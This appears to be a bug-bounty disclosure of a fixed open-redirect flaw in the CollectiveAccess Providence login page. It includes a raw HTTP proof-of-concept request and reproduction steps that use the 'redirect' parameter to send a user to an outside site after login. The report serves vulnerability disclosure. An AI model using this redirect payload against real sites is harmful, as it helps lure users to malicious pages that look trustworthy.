Open Redirect in collectiveaccess/providence

Valid

Reported on

Sep 24th 2021


Description

Open Redirect on Login with parameter ?redirect=

Proof of Concept

// PoC.request
POST /system/Auth/DoLogin HTTP/1.1
Host: demo.collectiveaccess.org
Cookie: ca_demo=ea7632ab-0ad8-4b0f-939f-9e292f232ff6; CA_ca_demo_ui_locale=en_US
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7051516316117565382118999645
Content-Length: 956
Origin: https://demo.collectiveaccess.org
Referer: https://demo.collectiveaccess.org/index.php/system/auth/login?redirect=https%3A%2F%2Fgoogle.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="_formName"

login
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="form_timestamp"

1632497569
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="crsfToken"

c743d449b4dc4db0b508f04a51ab51f3a4c3de54f8d4e0fe262faf66308f3d3e
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="username"

demo
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="password"

demo
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="redirect"

https://google.com
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="local"

0
-----------------------------7051516316117565382118999645--

Step to Reproduct

Access Demo Site with url https://demo.collectiveaccess.org/index.php/system/auth/login?redirect=https%3A%2F%2Fgoogle.com

When login right it will redirect to google.com

Impact

This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
CollectiveAccess confirmed that a fix has been merged on 8034eb 2 months ago
CollectiveAccess has been awarded the fix bounty